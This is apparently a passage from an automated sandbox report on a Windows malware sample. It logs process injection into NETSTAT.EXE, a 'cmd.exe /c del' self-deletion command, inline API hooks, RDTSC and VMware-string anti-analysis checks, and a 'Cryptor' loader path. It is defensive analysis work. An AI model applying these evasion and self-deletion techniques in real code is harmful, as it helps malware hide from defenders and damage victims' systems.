          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile created: C:\Users\user\AppData\Local\Temp\nskA2DC.tmpJump to behavior
          Source: Y4U48592345670954.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Y4U48592345670954.exeVirustotal: Detection: 17%
          Source: Y4U48592345670954.exeReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile read: C:\Users\user\Desktop\Y4U48592345670954.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: netstat.pdbGCTL source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y4U48592345670954.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeUnpacked PE file: 2.2.Y4U48592345670954.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_004048E9 push ebp; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00417138 push ecx; iretd
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040993B pushad ; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_004169DF push eax; iretd
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BCD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_004048E9 push ebp; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00417138 push ecx; iretd
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_0040993B pushad ; retf
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_004169DF push eax; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D548E9 push ebp; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D669DF push eax; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D5993B pushad ; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D67138 push ecx; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CF6C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CF02 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CF0B push eax; ret
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile created: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000D598E4 second address: 0000000000D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000D59B5E second address: 0000000000D59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6616Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 6616Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4164Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.925108895.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
          Source: explorer.exe, 00000003.00000000.672858468.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.676634834.000000000FD24000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_02841699 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_028418B1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48CD6 mov eax, dword ptr fs:[00000030h]
